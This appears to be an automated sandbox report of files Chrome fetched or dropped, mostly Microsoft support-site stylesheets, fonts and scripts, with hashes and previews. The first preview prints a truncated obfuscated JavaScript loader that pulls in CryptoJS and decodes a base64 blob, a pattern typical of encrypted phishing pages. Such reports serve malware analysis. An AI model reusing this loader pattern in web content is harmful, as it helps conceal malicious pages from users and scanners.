                                                                File Type:ASCII text, with very long lines (1329), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1966
                                                                Entropy (8bit):5.983505256565999
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3625B516261C4090BBD1A18234F39270
                                                                SHA1:9F6BF36C6743C3DBD2D3127BA94491EE4961D952
                                                                SHA-256:A3B570794FFA44C3F97B3B1FCE041BF648B720E126A7A805A3A93010EC8D95A1
                                                                SHA-512:CBC943A97551A0C748392F8012CF978B1E8F726D52B66928AEAA72BACAF9264916DE78757BA60348EE46254A94FF207D56DFB163C9DED8797FA4BD3A49058897
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview: var uoZrSqgPvNDpexXx = document.createElement("script");..uoZrSqgPvNDpexXx.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(uoZrSqgPvNDpexXx);..uoZrSqgPvNDpexXx.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiblNXSit3bG1wMUU3b0RCeG85eW1QYjQ4WmNLUFVqd2xlb3lxVEhxbklKRURQdURON3Rnc1JxZzhiZ2lyNHViMWZhamJUTnAzWm1hOU9JVVZuVXBxOXBEYzNxaVp0b1QxTXkwNUhVMGlmdk9zcEM5ekNiRmNEMFwvS29tb1JuRnRudHdVK0Y0NFZxTm1ublpYRlh6WXYwTW1tZ2JpWVZ1UEU2MW9NdGVyU2tcL05ITjh5Vjkzd0M5TEF4ajloZGIyUlZOK2RBdGxcL2EzVzIwQmZJSFBQVFJGdVRha3VGQ2xNZGI4VFloWTAySE9jWnZUZEVDeTFEa1pRNlJhbmxrZXIyVFF6WkNTVXVRZDhXcmdHXC9UbWMrMThkazRObTVCNXllejlkWWdDZDZGakJZQitSSWZcL3RldmpKdnVEUmRKVGNnVVVyZk1mNVp1T1hUckFqZmg4cjVGZm5IWmorb1Z2eHI1YnV6YnFDaHFINGhFbXQwK3dZcmRON2w5Wm5iVjRcL0s1UE1uZHpqY2M1eE1MdTluR0d5ZWxDaFI5VklwRnZXQkVKQ1NHNnFUXC8yZEdhK3NWUDlTV0Vvdm5lMDltUFcrXC9uTFZJQWxwT2o4Y1F0dVJ2eEg2Y0lnSUM5dzI3XC9VN0FNT28rTUhQUHl0MEJqMlU2cjBydHhNTGdtZlYwSVh2XC92MGRHTlRcLz
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):16
                                                                Entropy (8bit):3.625
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BEB5075867AC37A3C8903AB23A5ABA22
                                                                SHA1:86A41106441F795558A31574CBD24D5403E2F054
                                                                SHA-256:BD38B37956C818D4084814F47B69B7798F07AF7889D3D13DEBBD2D76ECB86095
                                                                SHA-512:976D88CFEF9792BC882CA8BB7F7F784BB97EA2046999D67C43DD4C2391943238BF9EE3DECD50DC2495829E65E9281D999E1272B188B489B1AFF59AECEE3E139A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkV74dSiH35ARIFDel_Cl4=?alt=proto
                                                                Preview:CgkKBw3pfwpeGgA=
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (1158)
                                                                Category:downloaded
                                                                Size (bytes):7935
                                                                Entropy (8bit):5.175600779310663
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:864A24D7C4A1097F30B215E79CB41967
                                                                SHA1:CE21463CB4C1509C45EDA1B12FF71EF4AB578DD5
                                                                SHA-256:7756407C953FC5FB0B4B2E965A32B5D129D73266F26A1A37D107C8501EC85767
                                                                SHA-512:A83980A658DD2CF73DD711FAA09DED768E6C85E64E5A868B396B69BB7C6964643128D517F01A7873B247211631C6C2DA9E16559BEE3D44795997AA24FBB8A5DE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/en-us/videoplayer-nocookie/embed/RE4EIXC?pid=ocpVideo1&jsapi=true&maskLevel=20&market=en-us
                                                                Preview:<!DOCTYPE html>. CREATED BY VID TEAM -->.<html lang="en-us". dir="ltr">.<head. data-info="{&quot;v&quot;:&quot;1.0.8745.29656&quot;,&quot;a&quot;:&quot;c8fc48f1-a237-44d8-b306-f4d035e201c7&quot;,&quot;cn&quot;:&quot;OneDeployContainer&quot;,&quot;az&quot;:&quot;{did:92e7dc58ca2143cfb2c818b047cc5cd1, rid: OneDeployContainer, sn: marketingsites-prod-odeastasia, dt: 2018-05-03T20:14:23.4188992Z, bt: 2023-12-12T00:28:32.0000000Z}&quot;,&quot;ddpi&quot;:&quot;1&quot;,&quot;dpio&quot;:&quot;&quot;,&quot;dpi&quot;:&quot;1&quot;,&quot;dg&quot;:&quot;uplevel.web.pc.webkit.chrome&quot;,&quot;th&quot;:&quot;default&quot;,&quot;m&quot;:&quot;en-us&quot;,&quot;l&quot;:&quot;en-us&quot;,&quot;mu&quot;:&quot;en-us&quot;,&quot;rp&quot;:&quot;/en-us/videoplayer/embed/RW16rdm&quot;,&quot;f&quot;:null,&quot;bh&quot;:{}}">. <meta charset="UTF-8" />.. <meta http-equiv="x-ua-compatible". content="ie=edge" />. <meta name="viewport". content="width=device-wid
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 149676
                                                                Category:dropped
                                                                Size (bytes):51912
                                                                Entropy (8bit):7.994903470793642
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:CD9AEEF65F998998C2A62AD11AB1FE52
                                                                SHA1:0313ADE2716716ECA82B7CF3428EF4735EA7AEBE
                                                                SHA-256:56C9F3CB9D325F78A6C2C541935EC990809D4E6336139840F7EB41D802C21D4E
                                                                SHA-512:16E0ADDD9759610E6D2A808E7D7C30428C5CBC3C2FF0AC65401E30B5E7130ECD1ED57DA83D5125ADD173C24EE42F398DD0D56ED87A9493EDDF05A79D6265FC7E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:...........i[.H.(......KKma........n....3...l.e$...E...~b.L.d....<.~...)32.KDdDdd...k...se........W........x.g.............W.AR.......^..+QX..J...x..^.'.G...oR...c%}.+.8....Ie.$).....bBu.r...K...A.>.....J....<?..0J.._..!.6..0.+.p...`.P9..q.D.....?x..$3H...x._I..2....Q...R..g....C.!T8.../t0.....t..D..5BU.....F..h&Z..'.........Yu..l..r.L....8.T"..+4X.......@2y..c/.!.......?.aj...T..R......].4.N...-U..$~M.A..g....I.l..;...z..4.&...8H.f.. z..F...K../.../..?..p.c.T.f}hA.0z.P~.B....._..?...?@.D.Gg..S.@..\....6....|..f.oQl>y0.vl.nxS..=.....n...v...M.p.>..j...&....H55..4J_.~..K.C.....T.....[...M|..>.Mg../................*=;.*M.&.s=...........Z.Z...R.2...;_.;o8.E[.B......&..b?..a..k..@.I.......'.'.Z....|.h.B>..&......s`...].gi....Z..A8|}5S...... ).+J...Co..n.........!.....+H=.c.;cE... A/Ev../..".J.~..H..a.?....*tS1M.x.d....F>......TS..`V<.U..,..vH.S.....n@"..hm....|>2....u|;..taJV.0J...gZ..........a4.v..|o...^_...O.&.../W...{.M.....M.BJ.....
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):47992
                                                                Entropy (8bit):5.605846858683577
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CF3402D7483B127DED4069D651EA4A22
                                                                SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format (Version 2), TrueType, length 36748, version 0.0
                                                                Category:downloaded
                                                                Size (bytes):36748
                                                                Entropy (8bit):7.993571055882259
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:88749B8058F99835F5A6B87FCC9CEDA1
                                                                SHA1:A491726E067475E187E270D4469A96E016BD30A7
                                                                SHA-256:F447D199F99F6EC55B5308B737A69F384032D3D0C1D05FBC41782AA50ECEB92C
                                                                SHA-512:D595CC3E4220CB879389138D34B2DFBC9DC40EA5E83A81944FA73CBDFBBFC70D53285F8A11CEB921F55C7171EFB4A1242AE1819F0A505C0ECA06772357B2AF65
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/css/fonts/support-icons/fluent/latest_v1_95.woff2
                                                                Preview:wOF2..............M....<.........................`..b........W.6.$..<..4.. ..X. [..QD`...P.<DT.~X..I...."!........_..M|..|[.'...FR.EH?b......0...J.....k...K.....[...1ir.x.I)\H...0..8q..... i....u.~..1...F..Cd........px~.=%..D.H.....(..@A......N..p.\.v...m..[.nkW...m...O]....6.7.;.'$....D.4..q.?.E.\%5S.UjB...V)..x...Y.C.........o....j..4@r..P{.H......f.....8 ..Q....(......f..8p....\d.....R.4......m........%r.K.....F3..I...!.k8r.d{4.OD&...0...r..B.2e.4u.....Q._...lR.v...F..p...J%IQ.j.....alI.D..&.?..... .N...Z=...G.%..o.N..I6.."u.j._.!...N..L...).&I...../..N.n......J].%....5.p.H.#+..dw..".h.."..O...i.D.TI..I.&.J...%g..-Y,.-.-',O.....y.gm.l3m+......Q..Q..P..Q....m......0.#0..1.........q.wp.....'..#.(..L...SQ*I...5..4.6.f.M.....ct.....E.......$9.K..sRN.i8...\.+s5..-.+...<.G....3x=o...^.e-YG....&.G......B.R..".W.S..C.X.W.UT..t=.H7..X=W...Z.]......T'LR...05L]...7#.....7........>.>..Q....q.q..Y.peu.s.pmq.u..4.,.\.....g.t..........DB.!.<v..|R..E.G.E.]5.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (26071), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):26086
                                                                Entropy (8bit):5.432818104736514
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A923FB946929633E387E4D2017006546
                                                                SHA1:84D3DCF57A9EF34EA731A1B28F9ECE4B0B267A08
                                                                SHA-256:67A664918FD7F224CCE362DB7078440CD693E1EF6B30EFF33C06F112C17102FA
                                                                SHA-512:A974D3511DD1ED3197BC6A90F9561CDB83120E99D8276C38E32C79005E59C5C7048C8652E3DF5A1DB06191B3B6793A4C75A5C2060CC12ACB36D1E6F31C2E6BFB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/css/Article/css.css?v=Z6ZkkY_X8iTM42LbcHhEDNaT4e9rMO_zPAbxEsFxAvo
                                                                Preview:.@media screen{-ms-viewport{width:device-width}}@media screen and (-ms-high-contrast: active){textarea[placeholder],input[type=search][placeholder],input[type=text][placeholder]{border-color:WindowText}}header,footer,hgroup,nav,section{display:block}.font-bold{font-weight:600}.ocHidden{display:none !important}.clear-fix:after{content:".";clear:both;display:block;height:0;visibility:hidden}input{-webkit-appearance:none;-webkit-border-radius:0}#obf-EmailCheckBox,#obf-BasicFormScreenshotCheckbox{-webkit-appearance:revert}.content-wrapper{margin:0 auto;width:100%}.main-content,.ocFB,#ocAsstHelp{font-size:62.5%}.main-content #ocAsstHelp{font-size:100%}#product,#home,#category,#endnode{min-width:1220px;margin-top:10px}#endnode{margin-top:0}#universal-header-search-auto-suggest-transparent,.f-auto-suggest-no-results.f-auto-suggest-no-results{display:none}.grd{display:block;position:relative;width:90%;margin:0 auto;max-width:1440px;padding:0 1em;padding:0 1vw}.grd *{box-sizing:border-box}.gr
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65460)
                                                                Category:downloaded
                                                                Size (bytes):566897
                                                                Entropy (8bit):5.427009136389396
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C0BB28600CF931A17482376C5E27CABE
                                                                SHA1:3C9B65F94334C9312F168AC51D2067D07DB3A619
                                                                SHA-256:70EB3BBB025DC4C9CB7F7297EF68B928E4A7D9F77F8B60BD4DE6C526CF195464
                                                                SHA-512:5957C114E0A04A949C6B8D8C104F62D810079DA249B87C8E5D3183AD7E57A4B2657C9C7BE8C87FC990754FFD8B30BEC8719A1279AB7B6ECEB114D12690007268
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/lib/ucs/dist/ucsCreativeService.js?v=cOs7uwJdxMnLf3KX72i5KOSn2fd_i2C9TebFJs8ZVGQ
                                                                Preview:/*! For license information please see ucsCreativeService.js.LICENSE.txt */.!function(){var e={646:function(e,t,n){"use strict";function r(e){o.length||(i(),!0),o[o.length]=e}e.exports=r;var i,o=[],a=0,u=1024;function c(){for(;a<o.length;){var e=a;if(a+=1,o[e].call(),a>u){for(var t=0,n=o.length-a;t<n;t++)o[t]=o[t+a];o.length-=a,a=0}}o.length=0,a=0,!1}var l="undefined"!==typeof n.g?n.g:self,s=l.MutationObserver||l.WebKitMutationObserver;function f(e){return function(){var t=setTimeout(r,0),n=setInterval(r,50);function r(){clearTimeout(t),clearInterval(n),e()}}}i="function"===typeof s?function(e){var t=1,n=new s(e),r=document.createTextNode("");return n.observe(r,{characterData:!0}),function(){t=-t,r.data=t}}(c):f(c),r.requestFlush=i,r.makeRequestCallFromTimer=f},2277:function(e,t){var n;!function(){"use strict";var r={}.hasOwnProperty;function i(){for(var e=[],t=0;t<arguments.length;t++){var n=arguments[t];if(n){var o=typeof n;if("string"===o||"number"===o)e.push(n);else if(Array.isArra
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (10387), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):10930
                                                                Entropy (8bit):4.777922581824855
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:509E44BDCA06692FD924908DE96BE75B
                                                                SHA1:2B68EABA6109F02706D13775CBC357CA40785ABE
                                                                SHA-256:37D8CC7CC2283BFB3B3804CDD23E4B62A98EF4C0AA1C38DFA5A515D91B9A132F
                                                                SHA-512:44E648E2433C01B879CF952AD1ACBAEE97EF82C18F846429019EF343E5272B568BE3BD9CC530E244E1E282D7CF42A1D215E79756968A4D82B845F0E242551ACF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/css/glyphs/glyphs.css?v=N9jMfMIoO_s7OATN0j5LYqmO9MCqHDjfpaUV2RuaEy8
                                                                Preview:..icon-fluent{font-family:Support Fluent Icons;font-style:normal;font-weight:normal;line-height:1px;display:inline-block;vertical-align:baseline;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.supTabControlHeader .supTabControlHeaderActive .icon-fluent{font-weight:900;color:#000}.supTabControlHeader .icon-fluent{color:gray;font-size:.9em;padding-right:5px}html[dir=rtl] .supTabControlHeader .icon-fluent{padding-left:5px}.icon-mdl2{font-family:Support MDL2 Assets;font-style:normal;font-weight:normal;line-height:1px;display:inline-block;vertical-align:baseline;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.supTabControlHeader .supTabControlHeaderActive .icon-mdl2{font-weight:900;color:#000}.supTabControlHeader .icon-mdl2{color:gray;font-size:.9em;padding-right:5px}html[dir=rtl] .supTabControlHeader .icon-mdl2{padding-left:5px}.icon-accept:before{content:"."}.icon-actioncenter:before{content:"."}.icon-actioncenternotification:before{conten
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):4887
                                                                Entropy (8bit):5.220967623988187
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E3BFA1F39BE3EB028227FBF9F90E0997
                                                                SHA1:D55CF9A507D358614541C82019249A7A5E4EC082
                                                                SHA-256:C6B1182BC9C51793218987EAD9BD47F1AF89F61D2796C5A6990A910DE38F1EB3
                                                                SHA-512:74CBB393F88105F02CCD4A308BDA04DA1AF3A8E176AA190D1659F0693261AF0C30389ED99AEE48462573F9146CF80A606605F759FFA118005481CDB3268258F7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:{"captions":{"en-us":{"url":"https://prod-video-cms-rt-microsoft-com.akamaized.net/cms/api/am/videofiledata/RE4EIXC-enus?ver=e63f","link":{"href":"/vhs/api/videos//captions/en-us","method":"GET","rel":"self"}}},"transcripts":{"en-us":{"url":"https://prod-video-cms-rt-microsoft-com.akamaized.net/cms/api/am/videofiledata/RE4EIXC-tscriptenus?ver=63d3","link":{"href":"/vhs/api/videos//transcripts/en-us","method":"GET","rel":"self"}}},"snippet":{"activeEndDate":"9999-12-31T23:59:59","activeStartDate":"2020-08-31T22:25:51","culture":"en-us","supplier":{"name":"","source":{"name":""}},"thumbnails":{"extrasmall":{"height":0,"width":0,"assetId":"RE4EIZB","url":"http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4EIZB?ver=f4a3","link":{"href":"/vhs/api/videos//thumbnails/extrasmall","method":"GET","rel":"self"}},"small":{"height":0,"width":0,"assetId":"RE4EIZB","url":"http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4EIZB?ver=f4a3","link":{
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                Category:downloaded
                                                                Size (bytes):171486
                                                                Entropy (8bit):5.043877429718187
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B7AF9FB8EB3F12D3BAA37641537BEDC2
                                                                SHA1:A3FBB622FD4D19CDB371F0B71146DD9F2605D8A4
                                                                SHA-256:928ACFBA36CCD911340D2753DB52423F0C7F6FEAA72824E2A1EF6F5667ED4A71
                                                                SHA-512:1023C4D81F68C73E247850F17BF048615DDABB69ACF2429644BDAF8DC2A95930F7A29CEAE6FBD985E1162897483A860C8248557CDA2F1F3D3FF0589158625A49
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/43-5a5ab8/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                                Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (1789), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):1789
                                                                Entropy (8bit):4.949297796790656
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:49696FC959CE2121F8FC42BC0A295EDF
                                                                SHA1:353FE5D1F17B396C81383059C66E73574991A78B
                                                                SHA-256:E0CFF5C0E0126AD78EB3DCDDA610AD22A32FB4AA37EBA19FEA990E8C3AB3918A
                                                                SHA-512:AF4C277F64FD43CE18E94EE797FB7C4B3D19BD84B0741DFC30AE6E1FE77809EBB36CAA0341A4A86405D275E0AF63A951E488370F4A689636560049AA71084E05
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/css/fonts/site-fonts.css?v=4M_1wOASateOs9zdphCtIqMvtKo366Gf6pkOjDqzkYo
                                                                Preview:@font-face{font-family:"Segoe UI Bold";font-display:swap;font-weight:700;src:local("Segoe UI Bold"),url(segoe-ui/west-european/bold/latest.woff2) format("woff2"),url(segoe-ui/west-european/bold/latest.woff) format("woff")}@font-face{font-family:"Segoe UI Light";font-display:swap;font-weight:100;src:local("Segoe UI Light"),url(segoe-ui/west-european/light/latest.woff2) format("woff2"),url(segoe-ui/west-european/light/latest.woff) format("woff")}@font-face{font-family:"Segoe UI Semibold";font-display:swap;font-weight:600;src:local("Segoe UI Semibold"),url(segoe-ui/west-european/semibold/latest.woff2) format("woff2"),url(segoe-ui/west-european/semibold/latest.woff) format("woff")}@font-face{font-family:"Segoe UI Semilight";font-display:swap;font-weight:200;src:local("Segoe UI Semilight"),url(segoe-ui/west-european/semilight/latest.woff2) format("woff2"),url(segoe-ui/west-european/semilight/latest.woff) format("woff")}@font-face{font-family:"Segoe UI";font-display:swap;font-weight:400;src:
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (4370), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):4370
                                                                Entropy (8bit):5.070419363669657
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5F05B23BAD0F2D477C4E6B9266F99A74
                                                                SHA1:E6CC0BE0A86B8330B4FD16CE8EB27614FB313B40
                                                                SHA-256:70099F944DDCE86C3B9E24CE88C3C489EF4C63CEF20C4DA64A5DC33BBFE36512
                                                                SHA-512:664E997252C7A41F8D4E7A3FD34592D25809AFCD4EF9FB7A2542F9A3C05FC8F841D5F7E58DBF0A6F00C255F43C6A36D6597DDF5C7A0FFC049994002CC851ECB8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/css/promotionbanner/promotion-banner.css?v=cAmflE3c6Gw7niTOiMPEie9MY87yDE2mSl3DO7_jZRI
                                                                Preview:/*! Copyright (C) Microsoft. All rights reserved. */.uhfupgradeBanner{display:block;max-height:110px;border-bottom:.5px solid #aeaeae;box-shadow:0 1px 5px 3px #ccc;margin-bottom:10px}.uhfupgradeBanner .uhfbanner-container{max-width:1640px;max-height:inherit;display:block;position:relative;width:92%;margin-left:auto;margin-right:auto;padding-left:1vw;padding-right:1vw}.uhfupgradeBanner .uhfbanner-container .uhfbanner-wrapper{display:flex;flex-wrap:wrap;max-height:inherit}.uhfupgradeBanner .uhfbanner-container .uhfbanner-wrapper .uhfbanner-content{width:75%;align-items:stretch;float:left;position:relative;padding-top:1.5em;padding-bottom:1.5em;max-height:inherit}.uhfupgradeBanner .uhfbanner-container .uhfbanner-wrapper .uhfbanner-controls-wrapper{align-items:stretch;float:left;position:relative;padding-top:1.1vw;padding-bottom:1vw;width:24%}.uhfupgradeBanner .uhfbanner-controls{float:right}.uhfupgradeBanner .promoHeading{font-weight:600;font-size:20px;margin:0;position:relative;font-fami
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 350 x 67, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):3205
                                                                Entropy (8bit):7.879543500340617
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E3CC7FC3E0592F585BBC1A7FE2B569F3
                                                                SHA1:77F4800695CFE66A37192DD6154E4B50C9739433
                                                                SHA-256:C786C77C67296D810055417FCC8DD45AD16BEDD1C4C466F437AD53C960D7095B
                                                                SHA-512:2DC182CF8B7D9AD18291B06BE03F3ED6FC799E00A7006D9D9B2CE2ADF3A47075B0E9AD07531A72302760CEE25823A350805B97D3FCB4B68FD75E6A0AD46CBBB0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR...^...C.....[v......sRGB.........gAMA......a..../IDATx^.M.$..F..........g...B.....@..i..@'.......B00..-..i.i.....2>/K.s....k.{8........Un.7..3...c.n...n...n...n...n...n...n...n...n...n...On._.....rf...}...t......?.....GS..%./.;="mR.._^5.....MY.O~..o.._SN......Q._~..\2G.y.'k....+...3 .._~.N......yf./...wzD.|!...D[.5}..._}..AG`#"..E...r.....@..2........l..7.....N..d^...FF.......).....CQ|....p......2..MI`..,..;.Ts.bn..../.3.c....h..9.].9..%.........lD.V..\.~.7?.yn..s......w!._..9..Z..7]..\z*...$.~...@p.H&......K.0.-.........7.............s....9.J.'FJ.....}4.p`-..s1%........X..:..'.X.O..#-G.rn.B..Mi..!..B.;.9 ..N...=...2.%<y......3..........*1.D-.U......q.0.>.....O,.%O..IJ.=`y..r.....Q. .w.$6.i+P......dD@...}x.7..g.....,/).d.'>r..g....&dj.....B.."(.>.,#..n<If..x.9#E.Z............*..7.....L!..!Bq..._W.#2........S.SUY.L.P.......y.....,s......).. ..Q@6.........T.q:,.D...Y........_. D.....%.)..#;...X..8..M1.O.XT"..=[..9..u&22.9..F4
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2974), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):2974
                                                                Entropy (8bit):5.078147905018725
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8C4035FBAA828A7E23B8584328FE8F88
                                                                SHA1:F222869596F1E3E94C131DE6E85BF233ED1EC511
                                                                SHA-256:0F4950468225BC51D24014536FE8004392A415EF01F0DB92A258818E74F9C59E
                                                                SHA-512:74D807189427397E2C8FC35D986616C1104E9125B39F885F61D9A1AA225D566AB3474061B39C64FF69886E5AEA8D6B4C9F28B4DCC9CB6F552D90DB0C651582DB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/css/sitewide/articleCss-overwrite.css?v=D0lQRoIlvFHSQBRTb-gAQ5KkFe8B8NuSoliBjnT5xZ4
                                                                Preview:div.shimmer-effect{display:flex;width:100%;height:300px}.shimmer-line-container{display:flex;flex-direction:column;width:100%;height:100%}.shimmer-line{background-color:#edebe9;position:relative}.banded-wrapper-reversed:nth-child(odd) .shimmer-line{background-color:#d7d4d2;position:relative}.banded-wrapper-reversed:nth-child(odd) .shimmer-line::before{content:"";width:50%;height:100%;position:absolute;top:0;left:0;background:linear-gradient(to right, #d7d4d2 0%, #b9b9b9 50%, #d7d4d2 100%);animation:shimmer 2s ease-out infinite}.banded-wrapper:nth-child(even) .shimmer-line{background-color:#d7d4d2;position:relative}.banded-wrapper:nth-child(even) .shimmer-line::before{content:"";width:50%;height:100%;position:absolute;top:0;left:0;background:linear-gradient(to right, #d7d4d2 0%, #b9b9b9 50%, #d7d4d2 100%);animation:shimmer 2s ease-out infinite}.shimmer-image-container{position:absolute;right:0;width:50%;top:5%}.banded-wrapper-reversed:nth-child(odd) .shimmer-image{position:relative;heig
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (17287), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):17287
                                                                Entropy (8bit):5.462304583783165
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6F229F85F8E9BA83FB79799E1C7198A0
                                                                SHA1:8BFAB2A24326C9D53F283EAF12E8457E4CB6964B
                                                                SHA-256:39D3E70B4FE34430E7823A17CE0857716E53855E4850BDF2FA90973E2124B6AD
                                                                SHA-512:7171CB8200AB1F778376A2E2295B704DCAFEA4116A8ED398946313ED720CA54D4621D222CC6BDDCD2A49949BD9F055C9D0430EBF903605A38C16F43D00579107
                                                                Malicious:false
                                                                Reputation:unknown
